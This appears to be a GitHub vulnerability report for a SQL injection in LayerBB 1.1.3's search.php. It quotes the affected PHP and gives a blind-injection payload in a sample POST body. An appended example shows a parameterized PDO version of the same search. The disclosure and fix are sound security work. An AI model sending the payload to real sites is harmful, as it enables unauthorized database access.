SQL injection vulnerability #51

Open
@yaoyao6688

Description

LayerBB 1.1.3 has SQL Injection via the search.php search_query parameter.

Steps to Reproduce Issue

In search.php, lines 86-91:

```php
if ((isset($_POST['user_search']) && isset($_POST['search_type'])) || !isset($_POST['search_type'])) {
    $MYSQL->bind('search_query', $search_query);
    $query = $MYSQL->query("SELECT * FROM {prefix}users WHERE username LIKE CONCAT('%',:search_query,'%');");
```

Unfiltered search_query results in SQL injection.

POC

Packet parameters:

```
search_query=admin' RLIKE (SELECT (CASE WHEN (5268=5268) THEN 0x61646d696e ELSE 0x28 END)) AND 'GdPB'='GdPB&time_from=1996&time_to=2019&user_search=on&search_type=advanced&search_submit=Search
```

Server Environment (PHP, MySQL, Apache Version and Operating System):

Version 1.1.3
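For comparison, here is the same username search written as a genuine server-side prepared statement. This is an added example, not LayerBB's code and not a patch from the project; it assumes a PDO connection (`$pdo`) and a table prefix (`$prefix`) that comes from trusted configuration, and it uses `'!'` as the LIKE escape character so that the user's `%` and `_` are matched literally rather than treated as wildcards.

```php
<?php
// Added example (not LayerBB's own code): a username search where the user
// input is only ever bound as a value, so it cannot change the SQL text.

function escapeLikePattern(string $value): string
{
    // Inside LIKE, '%' and '_' are wildcards. Escape them (and the escape
    // character itself) so "admin_" cannot silently match "admin1".
    // Order matters: '!' must be doubled before the other replacements add
    // new '!' characters.
    return str_replace(['!', '%', '_'], ['!!', '!%', '!_'], $value);
}

function searchUsersByName(PDO $pdo, string $prefix, string $searchQuery): array
{
    // Identifiers cannot be bound, so the prefix is validated instead of
    // interpolated blindly. (Assumes the prefix is a config constant.)
    if (!preg_match('/^[A-Za-z0-9_]*$/', $prefix)) {
        throw new InvalidArgumentException('invalid table prefix');
    }

    // The wildcards are added here in PHP, around the escaped input, and the
    // whole pattern is sent as one parameter. ESCAPE '!' tells MySQL which
    // character escapeLikePattern() used.
    $sql = "SELECT id, username FROM {$prefix}users "
         . "WHERE username LIKE :pattern ESCAPE '!' "
         . "ORDER BY username LIMIT 50";

    $stmt = $pdo->prepare($sql);
    $stmt->bindValue(':pattern', '%' . escapeLikePattern($searchQuery) . '%', PDO::PARAM_STR);
    $stmt->execute();

    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Connection settings are placeholders; ATTR_EMULATE_PREPARES = false makes
// PDO use real server-side prepared statements rather than client-side
// string interpolation.
$pdo = new PDO(
    'mysql:host=localhost;dbname=layerbb;charset=utf8mb4',
    'db_user',
    'db_password',
    [
        PDO::ATTR_ERRMODE          => PDO::ERRMODE_EXCEPTION,
        PDO::ATTR_EMULATE_PREPARES => false,
    ]
);

// Constructed input containing a quote: it is plain data here, so the query
// simply looks for usernames containing o'brien.
$rows = searchUsersByName($pdo, 'layerbb_', "o'brien");
foreach ($rows as $row) {
    echo $row['username'], PHP_EOL;
}
```

The point of the contrast with the snippet in the report is that the query text never contains anything derived from `$_POST`; the only thing the database receives from the user is a parameter value. Whether a wrapper's `bind()` method achieves that depends on whether it forwards to a real prepared statement or builds the string itself, which is what a reviewer should check when triaging this kind of report.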
